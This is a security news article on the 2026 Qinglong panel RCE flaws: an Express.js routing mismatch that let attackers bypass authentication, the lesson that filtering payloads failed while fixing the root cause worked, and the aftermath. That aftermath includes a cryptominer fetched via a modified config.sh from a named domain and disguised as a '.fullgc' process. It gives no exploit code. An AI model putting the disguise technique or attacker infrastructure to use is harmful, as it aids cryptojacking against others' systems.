Qinglong RCE Vulnerability: Express.js Bypass Revealed

RCE authentication bypass discovered in Qinglong: how Express.js routing differences enabled the attack and why payload filtering fails.

Qinglong RCE Vulnerability: Express.js Bypass Revealed

Over 19,400 stars and 3,200 forks on GitHub: this is the potential impact of the RCE (Remote Code Execution) vulnerabilities that hit the Qinglong project between February and March 2026. The flaws, classified as CVE-2026-3965 and CVE-2026-4047, allowed attackers to bypass authentication and take control of publicly exposed panels, installing sophisticated cryptominers and compromising broader monitoring infrastructures.

The context of RCE vulnerabilities

Remote Code Execution (RCE) vulnerabilities have long been considered among the most dangerous in the cybersecurity landscape, as they allow attackers to execute malicious code directly on the target machine. Historically, flaws of this type have had devastating consequences: in December 2021, multiple RCE vulnerabilities in Log4J allowed vulnerable applications to be exploited to distribute cryptojackers and other malware. Similarly, in 2017, the WannaCry ransomware spread on a massive scale by exploiting the EternalBlue vulnerability in the SMB protocol, allowing the execution of malicious code and the encryption of files. As highlighted by Cyberment experts, RCEs are ranked among the most critical types of flaws precisely because of the level of access they grant to the attacker.

In the specific case of Qinglong, versions 2.20.1 and earlier were exposed to a deep logic issue. The attack began between February 7 and 8, 2026, when the first exploits started hitting exposed panels, even before the vulnerabilities were made public. Only on February 27, 2026, were the authentication bypass flaws publicly reported through Issues #2933 and #2934 on GitHub, and on March 1, 2026, the project maintainer confirmed the security vulnerability, urging users to promptly update their systems.

The discrepancy in Express.js routing

The technical core of vulnerabilities CVE-2026-3965 and CVE-2026-4047 lies in a logical mismatch between the authorization managed by the middleware and the routing of the Express.js framework. As highlighted by Snyk's analysis, "The auth layer assumed certain URL patterns would always be handled one way, while Express.js treated them differently."

This divergence in interpreting URL paths created a vulnerability window that attackers exploited to elude security checks and access administrative functionalities without valid credentials. The Express.js framework, processing requests differently than expected by the authentication layer, left exposed endpoints that should have been protected, allowing the execution of arbitrary commands on the server.

Why blocking the payload is ineffective

Faced with the active exploitation of a vulnerability, developers' instinctive reaction is often to immediately block the observed malicious payload. However, this strategy proved insufficient in Qinglong's case. On February 8, 2026, in response to the ongoing attacks, Copilot SWE Agent submitted PR #2924 to address the shell injection issue in configuration files. This mitigation attempt, however, was never merged into the main project because it limited itself to filtering the specific payload without solving the root cause.

The security lesson here is central: treating the symptom rather than the disease opens the door to future evasions. As Snyk pointed out, "When an application is being actively exploited, the instinct is to block the observed payload. But if the root cause is an auth bypass, payload-level filtering is insufficient — attackers will simply pivot to a different payload."

The effective solution came with PR #2941, which fixed the authentication bypass by actually resolving the routing discrepancy at its root, instead of simply applying a patch to the observed payloads. This intervention eliminated the attack surface, rendering any variant of the original payload useless.

The .fullgc cryptominer and process hiding

Beyond the vulnerability itself, the attack on Qinglong stood out for its sophisticated malware persistence and hiding techniques. Once access was obtained through the bypass, attackers modified the config.sh file to download cryptomining binaries from the file.551911.xyz domain. The malware, compatible with Linux x86_64, ARM64, and even macOS variants, was saved in the /ql/data/db/.fullgc path.

To disguise the infection and delay investigations by system administrators, the miner process was named '.fullgc'. This choice was not accidental: the name mimics a harmless Java/JVM process known as 'Full Garbage Collection', a routine event that justifies CPU usage spikes. And this was precisely the main impact on compromised machines, with administrators reporting CPU usage between 85 and 100%. The ability to pass off an anomalous computational load as a normal memory cleanup cycle allowed the cryptominer to operate undisturbed for a longer period.

The Nezha monitoring compromise

The consequences of the RCE exploit were not limited to the single machine hosting Qinglong. At least one user reported that attackers exploited the access gained to compromise their Nezha monitoring panel. This further breach provided the attackers with visibility into hundreds of additional machines connected to the monitoring infrastructure, drastically amplifying the attack's reach.

Using management and monitoring software as an entry point to extend compromise is a known tactic. In other contexts, as reported by Matrice Digitale, attackers have exploited vulnerabilities in ASP.NET and Outlook to inject malicious code via modified ViewState, employing post-exploitation trojans like Godzilla to maintain access and distribute commands on target IIS servers. The goal of exploiting initial access to move laterally and exfiltrate data or install ransomware is a constant in advanced RCE threats.

Frequently asked questions

What is Remote Code Execution (RCE)?
An RCE vulnerability allows an attacker to execute arbitrary code on a remote system. These flaws are particularly critical because they allow full control of the victim machine, paving the way for the installation of malware, such as ransomware or spyware, and the compromise of further internal infrastructures.
How did the bypass in Qinglong elude authentication?
The bypass exploited a logical divergence between the middleware authorization and Express.js routing. The authentication layer assumed that certain URL paths would be handled in a specific way, while the Express.js framework interpreted them differently, leaving sensitive endpoints exposed that should have required credentials.
Why was the malicious process named .fullgc?
Attackers renamed the cryptominer process to '.fullgc' to mimic the Java Virtual Machine's 'Full Garbage Collection'. This naming served to justify CPU usage spikes (up to 100%) in the eyes of system administrators, delaying the detection of the anomaly.

This article is a summary based exclusively on the listed sources.

Sources